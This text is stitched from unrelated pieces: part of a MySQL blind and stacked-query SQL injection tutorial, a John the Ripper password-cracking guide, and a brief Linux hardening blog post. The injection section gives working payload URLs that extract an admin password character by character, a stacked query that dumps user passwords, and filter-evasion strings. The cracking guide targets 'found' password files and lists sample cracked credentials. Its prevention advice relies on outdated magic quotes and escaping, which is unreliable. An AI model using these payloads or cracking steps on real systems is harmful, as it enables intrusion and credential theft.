mysql> select substring(’Blind SQL’, 2, 1);
—————————-
| substring(’Blind SQL’, 2, 1) |
—————————-
| l |
—————————-

- LOWER(str)

Returns the string str with all characters changed to lowercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT LOWER(’SQL’);
—————-
| LOWER(’SQL’) |
—————-
| sql |
—————-

- UPPER(str)

Returns the string str with all characters changed to uppercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT UPPER(’sql’);
————–
| UPPER(’sql’) |
————–
| SQL |
————–

Now we have understood the principals MySQL functions that could be used while
trying to do a Blind SQL Injection attack. (consult MySQL reference manuals for others)

What we need again? Suppose that we know for a moment the admin password: “secret”.

mysql> select ascii(’s’);
———–
| ascii(’s’) |
———–
| 115|
———–

mysql> select ascii(’e');
———–
| ascii(’e') |
———–
| 101|
———–

mysql> select ascii(’c');
———–
| ascii(’c') |
———–
| 99 |
———–

mysql> select ascii(’r');
———–
| ascii(’r') |
———–
| 114|
———–

mysql> select ascii(’t');
———–
| ascii(’t') |
———–
| 116|
———–

It’s time to watch the source code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

[ ... ]

$SQL = “select * from news where id=”.$_GET['id'].” LIMIT 1″;

$result = mysql_query($SQL);

if (!$result) {
die(’Invalid query: ‘ . mysql_error());
}

[ ... ]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Now, try to “exploit the bug” by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

The query is TRUE (we know that the first letter of the password is ’s’) and therefore, the query will be:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115 LIMIT 1

What is the number 115? Read upon is the ascii value of the ’s’. We retrieved the first character
of the password (by using some MySQL functions).

.:. (SELECT pwd FROM usr WHERE id=1) => SELECT the password of the user with ID=1 (admin)
.:. (SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1) => Get the first letter of the password (in this case ’s’)
.:. ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) => Get the ASCII code of the first letter (115 in this case)

And how to retrieve the second letter of the password? Just carry out this query:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101 LIMIT 1

by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101

The third character? And the others? Just make the same query with the right values.
Take in mind that you can also use the “greater then” (>) and “less then” (<) symbols
instead of the equal; to find the ASCII letter between a range of letters.
Eg.: between 100 and 116; and so on.
——————————————————————————-[/]

—[ Double Query ]

Sometimes in some codes happends that a programmer use the MySQLi Class (MySQL Improved
Extension) that is an extension allows you to access to the functionality provided
by MySQL 4.1 and above.

I’ll explain a very interesting bug that could be very dangerous for the
system. A not properly sanitized variable passed in the method called multi_query of
the mysqli class can be used to perform a “double” sql query injection.

mysqli_multi_query (PHP 5) is able to performs one or more queries on the
database selected. The queries executed are concatenated by a semicolon.

Look this example to know what I’m talking about:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

<?php
$mysqli = new mysqli(”localhost”, “root”, “root”, “test”);

if (mysqli_connect_errno()) {
printf(”Connect failed: %s\n”, mysqli_connect_error());
exit();
}

$query = “SELECT user FROM usr WHERE id =”. $_GET['id'].”;”;
$query .= “SELECT texts FROM news WHERE id =”. $_GET['id'];

echo ‘UserName: ‘;

if ($mysqli->multi_query($query)) {
do {
/* the first result set */
if ($result = $mysqli->store_result()) {
while ($row = $result->fetch_row()) {
echo ” – ” .$row[0]. “<br>” ;
}
$result->free();
}
/* print divider */
if ($mysqli->more_results()) {
echo “/-/-/-/-/-/-/-/-/-/-/-/-/-/<br>”;
}
} while ($mysqli->next_result());
}

/* close connection */
$mysqli->close();
?>

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

If a user request the follow URL:

http://www.victim.net/CMS/multiple.php?id=2

The browser reply with this information:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: – ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- could be bypassed easily?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

But the source code is bugged. The $query variable is vulnerable because
a user can supply using the GET method, an evil id and can do multiple (evil) queries.

Trying with this request:

http://localhost/apache2-default/multiple1.php?id=2; SELECT pwd FROM usr/*

We will obtain the users passwords.

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: – ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- secret
- adpwd
- test

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
——————————————————————————-[/]

—[  Filters Evasion ]

Web Application could implements some input filters that prevent an attacker from
exploiting certain flaws such as SQL Injection, LFI or whatever. Therefore an application
can use some mechanism that are able to sanitize, block or parse in some ways
user-supply data. This kind of filters could be bypassed by using differents methods,
here I wanna try to give to you some ideas; but certainly one filter differ from
an other one so, you have to try/find different methods to bypass it.

- Imagine that we have to bypass a login form; but the comment symbol is blocked,
we can bypass this issue but injecting this data ‘ OR ‘a’ = ‘a instead of ‘ OR 1 = 1 /*

- The filter try to prevent an SQL Injection by using this kind of Signature: ‘ or 1=1 (Case-insensitive).
An attacker can bypass this filter using ‘ OR ‘foobar’ = ‘foobar for example.

- Suppose that the application filter the keyword “admin”, to bypass this filter we have just
to use some MySQL functions such as CONCAT or CHAR for example:
union select * from usr where user = concat(’adm’,'in’)/*
union select * from usr where user=char(97,100,109,105,110)/*

This is only a little part of “filter evasion techniques”. Different filters work
differently, I can’t stay on this topic forever; I just gave to you some ideas.
——————————————————————————-[/]

—[  SQL Injection Prevention ]

How to prevent this type of attacks? Here below I just wanna write some
tips that you can use to make your web application more secure.

1.) The file php.ini located on our HD (/etc/php5/apache2/php.ini, /etc/apache2/php.ini,
and so on..) can help us with the magic quote functions. Other interesting functions can
be setted to On; take a look inside this file.

Magic quotes can be used to escape automatically with backslash the user-supply single-quote (’),
double-quote (”), backslash (\) and NULL characters.
The 3 magic quotes directives are:

- magic_quotes_gpc, that affects HTTP request data such as GET, POST and COOKIE.
- magic_quotes_runtime, if enabled, most functions that return data from an external source, will have
quotes escaped with a backslash.
- magic_quotes_sybase, that escape the ‘ with ” instead of \’.

2.) deploy mod_security for example

3.) use functions such as addslashes() htmlspecialchars(), mysql_escape_string(), etc. to validate
every user inputs.

4.) For integer input validate it by casting the variable
——————————————————————————-[/]

—[  Conclusion ]

Here we are, at the end of this paper. As said upon, I hope you enjoyed it and
for any questions please mail me.
——————————————————————————-[/]

John the Ripper is a decrypting program for passwords. Although it has many

functions we will be looking at using it as a decryper for password files
you possess.

We will be looking at Password Files which you have put on your Hard Disk
- PREPARATION
SHORTCUT TIP FOR WINDOWS 95
PASSWORD FILES
- DECRYPTING
JTR MODES
SINGLE MODE
WORDFILE MODE
INCREMENTAL MODE
ALPHA
DIGITS
ALL
SHOW MODE – Saving the Decrypted Files
- ADVANCED COMMANDS
STOPPING JTR
RULES
SESSION and RESTORE
- JTR QUICK REFERENCE

——————–

. ———–
PREPARATION
———–
1. Download the correct version of JTR, use win32 for Win 95/98
2. Extract the zip File into a Directory
3. Make sure you have your Password Files in the same directory

—————————
SHORTCUT TIP FOR WINDOWS 95
—————————
1. Right Click on the [Start] Button, and choose Open
2. Double Click on [Programs] Folder
3. Right Click and Copy, [MS-DOS Prompt]
4. Close the [Programs] Folder
5. Right Click and Paste on the Desktop, a [MS-DOS Prompt] should appear
6. Right Click on the [MS-DOS Prompt] icon and choose Properties
7. Click on the Program Tab
8. In the box next to Working (It should have C:WINDOWS in there) Change
it to the Directory of where-ever the Program JOHN.EXE has been
extracted
9. Click on the [OK] button
10. Test what you have done by Double Clicking on the Icon, If you wish to
rename [MS-DOS Prompt] to JTR, then do so

————–
PASSWORD FILES
————–
A. Naming
I personally name my files with a p extension, some people use txt
eg If i had the password file to Dannis’, I would name it danni.p
The reason is that p stands for password file, I then name my decrypted
password files with a txt extension
It is really up to you what you name your password files, just remember
that the names should be less than 8 characters
eg likethis.p
B. Where should I put them?
Always have the password files you have found in the same directory as
JOHN.EXE, Its just easier to handle them that way

———-
DECRYPTING
———-
Depending on what JTR version you have downloaded, you have to change into
the directory JOHN.EXE is

———
JTR MODES
———
There are 3 main modes we will be dealing with
-single, -wordfile, -incremental

[KEYS]
[passfile] – this is the name of your password file
[wordlist] – this is the name of your wordlist
[output] – this is the name of the file you will name when you want to
save your decrypted passwords

———–
SINGLE MODE
———–
Single Mode attempts to find the weakest of all the passwords. This is one
of the fastest methods.

SINGLE MODE SYNTAX
john -single [passfile]
or you could use
john -si [passfile]

Example:
If you found a [passfile] and named it danni.p then you would type
john -si danni.p

Take a look at SCREEN SHOT OF A JTR SESSION

————-
WORDFILE MODE
————-
Wordfile Mode is the next quickest method. It requires the use of a wordlist
The wordlist must be in a single wordlist and not a combo list

WORDFILE SYNTAX
john -wordfile:[wordlist] [passfile]
or
john -w:[wordlist] [passfile]

Example:
If you found a [passfile] and named it danni.p and you had a [wordlist]
named mydict.txt then you would type

john -w:mydict.txt danni.p

Take a look at SCREEN SHOT OF A JTR SESSION

—————-
INCREMENTAL MODE
—————-
Incremental mode is the slowest mode and will try to decrypt every pass in
your passfile, as this can take days, months even years, I would use it as
a last resort

There are 4 basic commands we will be dealing with
digits, alpha, all, and leaving it blank

DIGITS mode
This will try to decrypt all the Passwords that are in numbers

ALPHA mode
This will try to decrypt all the Passwords that are letters only

ALL mode
This will try to decrypt all the Passwords, whether they are in numbers, in
letters or some special characters (@!^&…etc)

WITH NO MODE SELECTED
This will basically do everything to try to decrypt the password file

SYNTAX
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]

Example:
If you found a [passfile] and named it danni.p
john -i danni.p
john -i:DIGITS danni.p
john -i:ALPHA danni.p
john -i:ALL danni.p

Take a look at SCREEN SHOT OF A JTR SESSION

When running in this mode, If you ever want to stop it push CTRL – C

————————————–
SHOW MODE – Saving the Decrypted Files
————————————–
Finally, once JTR has finished its decrypting process, you will be ready
to enjoy the results. These you will save in a file name of your choice.

SHOW SYNTAX
john -show [passfile]>[output]

Example:
If you found a [passfile] and named it danni.p, you decide you want to name the
decrypted password file or [output] to danni.txt

john -show danni.p>danni.txt

Now you can open danni.txt in a TEXT EDITOR
You will see something like this

italia:italiano
makoto:makotox
PADWICK:PADWICKH
kelley:kelleyaj
bechtel:jbechtel
mequery:queryme
seeeee:meeeee
stevewm:stevenm

8 passwords cracked, 246 left

Hopefully you will get more passwords than the example though

—————–
ADVANCED COMMANDS
—————–
Here are a few more commands which prove handy when using JTR

————
STOPPING JTR
————
If at anytime you wish to stop the decrypting process then
Hold down the [ CTRL ] key and Push the [ C ] key

—–
RULES
—–
This command is used with the Wordfile Option, without it JTR will try only
the words in your wordlist. When this is activated it will try variations as
outlined in the john.ini file. This is also quite slow

RULES SYNTAX
john w:[wordlist] -rules [passfile]

——————
SESSION & RESTORE
——————
Decrypting by now you will notice can become a long a slow process, JTR
allows you to save save and restore sessions. A session is like a snap
shot of what you are decrypting. It remembers what file you used, and
where you were at if you decide to stop it. session can be used with any
of the main modes.

SESSION & RESTORE SYNTAX
john -restore
john -restore:[session name]
john -session:[session name]

[session name] is any name you choose

EXAMPLE
——-
Lets say you want to decrypt a file named danni.p

OK you’ve used the -si mode, which was quick
With your trusty wordlist file named biglist.txt you next run the -w mode

FINAL NOTES
———–
There are many other features that JTR uses, that are Advanced, these can be
found in the DOC folder in JTR, just use a text editor to open and read them
We were only concerned with getting at least 50% of the passwords. This may
be achieved by SINGLE and WORDFILE modes
SPEED is dependant on your CPU, If you screen looks like its frozen and
doing nothing, just hit any key a couple of times, you will see a mini
progress report.
Speed is also dependant on the size of your password file and the number of
salts, A salt can be thought of as a slightly different way to encrypt a
file. As there are many ways to encrypt a single password

——————-
JTR QUICK REFERENCE
——————-
[KEYS]
[passfile] – this is the name of your password file
[wordlist] – this is the name of your wordlist
[output] – this is the name of the file you will name when you want to
save your decrypted passwords
: – whenever you see a colon then use it in the command
- – whenever you see a minus sign then use it in the command
> – whenever you see this sign then use it in the command
[] – DO NOT INCLUDE THESE IN THE COMMAND

SINGLE MODE
john -si [passfile]
WORDFILE MODE
john -w:[wordlist] [passfile]
INCREMENTAL MODES
john -i [passfile]
john -i:ALL [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
SHOW MODES
john -show [passfile]>[output]

Loaded 254 passwords with 85 different salts (Standard DES [32/32 BS])
italia (italiano)
makoto (makotox)
PADWICK (PADWICKH)
kelley (kelleyaj)
bechtel (jbechtel)
mequery (queryme)
seeeee (meeeee)
stevewm (stevenm)
guesses: 8 time: 0:00:01:23 100% c/s: 25771 trying: zcatcatk – zcatcatz

Linux Security is a big topic and is difficult to be covered in one post. i will keep posting on this top time to time.

Below is some basic information; how we can secure a linux box.

1. Password Security
2. Directories Permissions/Ownership Security
3. Unnecessary Services
   
4. Network Security

1. Password Security

Make you password strong and lengthy. Combine letters, numbers, and symbols. Use password meter to test your passwords. Do not use root login for your normal work. only use limited users and for installation and other tasks where root login is required you can use su or sudo to become root and perform special task as soon as you are finished with your task press ctrl+D to return to normal user envirement.

2. Directories Permissions/Ownership Security

Linux have very good directory permision system as compared to Windows. All you need is to only change directory permissions where needed. and do not permit access to directoires like /etc /root to limited users as they could read important information that would help them hacking you box. You can use online permission calculator to calculate permisions .

3. Unnecessary Services
You need to disable all services that are not usefull to you. you can use sysv-rc-conf to check and manage all servces and their run levels. To disable a service you can uncheck a service run levels in sysv-rc-conf .

4. Network Security

Network Security is its self a big topic but at basic level you need to check which network services you are running at your linux server ( for example apache/httpd mysql bind ) . You can use firewall to disallow unneccessary access to these services . IPTABLE or IPCHAIN is firewall that is widely used to secure linux server. but for unauthorized access you need to configure each service to disallow. i will try to go in deep details of these services so stay tunned .

Your Comments will be appreciated.